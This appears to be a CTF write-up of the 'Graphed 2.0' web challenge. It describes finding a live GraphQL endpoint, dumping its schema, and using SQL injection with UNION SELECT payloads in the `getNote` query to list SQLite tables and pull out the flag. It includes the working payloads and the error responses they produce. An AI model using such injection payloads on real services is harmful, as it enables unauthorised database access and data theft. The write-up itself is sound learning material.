
# Graphed 2.0
We were given the challenge text:
graphed notes is finally here !!!!!! but it looks like something is still broken with that site

EU instance

US instance

author: pop_eax

On the website there's a text field, and a submit button. If you try to submit text, all you get is an error.
If we look at the source code, we see that there's some JavaScript that's commented out.
function create_note() {
alert("sorry but this functionality is disabeled due to technical problems");
//query_data = `mutation {createNote(body:${document.getElementById("note-content").value}, title:"anon note", username:"guest"){note{uuid}}}`;
//fetch(`/graphql?query=mutation{createNote(body:"ww", title:"anon note", username:"guest"){note{uuid}}}`, {method: "POST"});

If we try to curl to the endpoint GraphQL endpoint, we see that it still exists. I've never interacted with GraphQL before, but [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection) had lots of info about exploiting GraphQL. The first thing I did was dumping the entire database schema using this query:
Nothing in particular looked interesting to me at first, until I saw an example of [GraphQL SQLi](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection#sql-injection). One of the query fields, `getNote`, took an argument, `q`.
"name": "getNote",
"description": null,
"args": [
"name": "q",
"description": null,
"type": {
"kind": "SCALAR",
"name": "String",
"ofType": null
"defaultValue": null
"type": {
"kind": "LIST",
"name": null,
"ofType": {
"kind": "OBJECT",
"name": "NoteObject",
"ofType": null
"isDeprecated": false,
"deprecationReason": null
(Schema for `getNote` from the full dump)

I tried sending the payload `{getNote(q:"'") {uuid}}`, and I got results! I then searched for how to list SQLite3 database names, `SELECT name FROM sqlite_master`. I then tried a UNION SELECT attack. Since I already knew that `getNote` normally returned 4 columns from testing, I sent the payload `{getNote(q:"' UNION SELECT name,name,name,name FROM sqlite_master --")} {uuid}`. This gave me all the databases.
"errors": [
"message": "Received incompatible instance \"('Notes', 2, 3, 4)\"."
"message": "Received incompatible instance \"('ix_Notes_title', 2, 3, 4)\"."
"message": "Received incompatible instance \"('ix_users_username', 2, 3, 4)\"."
"message": "Received incompatible instance \"('users', 2, 3, 4)\"."
"message": "Received incompatible instance \"('\u0627\u0644\u0639\u0644\u0645', 2, 3, 4)\"."
"data": {
"getNote": [

The last database looked particularly suspicious, and with the query `{getNote(q:"' UNION SELECT *,* FROM \u0627\u0644\u0639\u0644\u0645 --") {uuid}}` I got the flag.
"errors": [
"message": "Received incompatible instance \"(0, \"flag{h0p3_u_can't_r3@d_1t9176}\", 0, \"flag{h0p3_u_can't_r3@d_1t9176}\")\"."
"data": {
"getNote": [

The flag was `flag{h0p3_u_can't_r3@d_1t9176}`.

Original writeup (https://github.com/WastefulNick/CTF-Writeups/tree/master/0x41414141/web/graphed_2).